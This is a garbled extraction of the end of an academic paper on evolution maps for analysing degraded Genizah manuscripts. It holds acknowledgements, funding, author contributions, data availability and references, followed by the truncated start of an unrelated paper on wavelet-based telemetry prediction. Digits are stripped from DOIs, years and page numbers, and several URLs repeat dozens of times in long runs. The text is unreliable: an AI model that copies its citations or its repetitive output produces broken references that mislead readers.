the information gained by the cems, and also applying evolution maps on additional features. among the uses we plan to examine in the usage of the maps as descriptor of a document for classification by writer or by origin manuscript (finding fragments of the manuscript). furthermore, we plan to deal with limitations we took in this work such as regarding more than one writing style in a page. another interesting direction we plan to investigate is using the maps for extracting automatically the degradation level of the document. the documents used in our experiments are accessible via the genizah project site (http: //www.genizah.org/). to receive the ground truth data, please contact the authors by email. acknowledgements this research was supported in part by the dfg-trilateral grant no. . we thank prof. uri ehrlich and uri safrai from the goldstein-goren department of jewish thought, ben-gurion university of the negev, for their assistance in generating the ground truth. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this project was funded by the german research foundation under contract fi / - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: german research foundation: fi / - . competing interests klara kedem is an academic editor for peerj computer science. author contributions • ofer biller conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • irina rabaev conceived and designed the experiments, performed the experiments, performed the computation work. • klara kedem conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • its’hak dinstein and jihad j. el-sana conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the ground truth transcription for a set of document from the genizah collection: named by catalog number, formated by webgt, and detailed at http://ieeexplore.ieee. org/xpl/articledetails.jsp?arnumber= . the data can be found at: http://www.cs.bgu.ac.il/∼billero/genizahdocumentsannotationdata.zip. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references asi a, saabni r, el-sana j. . text line segmentation for gray scale historical document images. in: proceedings of the workshop on historical document imaging and processing. new york: acm, – . available at http://dl.acm.org/citation.cfm?id= . biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dx.doi.org/ . /peerj-cs. badekas e, papamarkos n. . optimal combination of document binarization techniques using a self-organizing map neural network. engineering applications of artificial intelligence ( ): – doi . /j.engappai. . . . bar-yosef i, beckman i, kedem k, dinstein i. . binarization, character extraction, and writer identification of historical hebrew calligraphy documents. international journal on document analysis and recognition ( ): – doi . /s - - - . biller o, asi a, kedem k, el-sana j. . webgt: an interactive web-based system for historical document ground truth generation. technical report – . be’er sheva: computer science department, ben-gurion university of the negev, israel. bukhari ss, azawi miaa, shafait f, breuel tm. . document image segmentation using discriminative learning over connected components. in: doermann ds, govindaraju v, lopresti dp, natarajan p, eds. the ninth iapr international workshop on document analysis systems, das . new york: acm, – . de carvalho mag, da costa al, ferreira acb, marcondes césar júnior r. . image segmentation using component tree and normalized cut. in: sibgrapi. piscataway: ieee computer society, – . fischer a, frinken v, fornes a, bunke h. . transcription alignment of latin manuscripts using hidden markov models. in: st international workshop on historical document imaging and processing (hip). new york: acm, – . fischer a, keller a, frinken v, bunke h. . lexicon-free handwritten word spotting using character hmms. pattern recognition letters : – doi . /j.patrec. . . . gatos b, stamatopoulos n, louloudis g. . icdar handwriting segmentation contest. international journal on document analysis and recognition ( ): – doi . /s - - - . garz a, fischer a, sablatnig r, bunke h. . binarization-free text line segmentation for historical documents based on interest point clustering. in: document analysis systems (das), th iapr international workshop. piscataway: ieee, – . jain ak, zhong y. . page segmentation using texture analysis. pattern recognition ( ): – doi . / - ( ) -x. liu y, srihari sn. . document image binarization based on texture features. ieee transac- tions on pattern analysis and machine intelligence ( ): – doi . / . . mosorov v, kowalski tm. . the development of component tree for grayscale image segmentation. in: proceedings of the international conference on moderns problems of radio engineering, telecommunications and computer science tcset. piscataway: ieee, – . naegel b, wendling l. . a document binarization method based on connected operators. pattern recognition letters ( ): – doi . /j.patrec. . . . new b, ferrand l, pallier c, brysbaert m. . reexamining the word length effect in visual word recognition: new evidence from the english lexicon project. psychonomic bulletin and review ( ): – doi . /bf . ntirogiannis k, gatos b, pratikakis i. . a modified adaptive logical level binarization technique for historical document images. in: th international conference on document analysis and recognition. piscataway: ieee, – . pajdla t, urban m, chum o, matas j. . robust wide baseline stereo from maximally stable extremal regions. in: proceedings of the british machine vision conference. p. d and video. available at http://cmp.felk.cvut.cz/∼matas/papers/matas-bmvc .pdf. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . / . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /bf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf http://dx.doi.org/ . /peerj-cs. pikaz a, averbuch a. . digital image thresholding, based on topological stable-state. pattern recognition ( ): – doi . / - ( ) - . pratikakis i, gatos b, ntirogiannis k. . h-dibco —handwritten document image binarization competition. in: icfhr. piscataway: ieee computer society, – . rabaev i, biller o, el-sana j, kedem k, dinstein i. . text line detection in corrupted and damaged historical manuscripts. in: th international conference on document analysis and recognition (icdar’ ). piscataway: ieee. raju ss, pati pb, ramakrishnan ag. a. gabor filter based block energy analysis for text extraction from digital document images. in: proceedings of the first international workshop on document image analysis for libraries (dial’ ). piscataway: ieee computer society, . available at http://dl.acm.org/citation.cfm?id= . . raju ss, pati pb, ramakrishnan ag. b. gabor filter based block energy analysis for text extraction from digital document images. in: document image analysis for libraries. piscataway: ieee, – . rivest-hénault d, moghaddam rf, cheriet m. . a local linear level set method for the binarization of degraded historical document images. international journal on document analysis and recognition ( ): – doi . /s - - - . roy p, pal u, llados j, delalandre m. . multi-oriented and multi-sized touching character segmentation using dynamic programming. in: proceedings of the th international conference on document analysis and recognition, icdar ’ . piscataway: ieee computer society, – . su b, lu s, tan cl. . robust document image binarization technique for degraded document images. ieee transactions on image processing ( ): – doi . /tip. . . wen d, ding x. . a general framework for multicharacter segmentation and its application in recognizing multilingual asian documents. in: smith ehb, hu j, allan j, eds. proceedings of the spie conference on document recognition and retrieval xi, vol. , bellingham: spie, – . available at https://www.msu.edu/∼wendi/publication/drrxi manuscript.pdf. zagoris k, papamarko n. . text extraction using document structure features and support vector machines. in: proceedings of the th iasted international conference computer graphics and imaging (cgim ). calgary: iasted, – . biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - ( ) - http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tip. . https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf http://dx.doi.org/ . /peerj-cs. evolution maps and applications introduction related work evolution maps definition of the evolution map construction of the evolution map analysis of the cem applications estimation of character dimensions improving binarization methods line segmentation of degraded documents stroke width estimation analysis of feature distribution in documents summary acknowledgements references application of wavelet analysis in the prediction of telemetry data international journal of advanced network, monitoring and controls volume , no. , application of wavelet analysis in the prediction of telemetry data xu jiangtao school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com liu pingping school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—with the rapid development of space technology, the increasing number of spacecraft, in-orbit risk also increases, how to ensure that the spacecraft safety and reliability is particularly important. prediction technology can predict the failure of the spacecraft in advance, 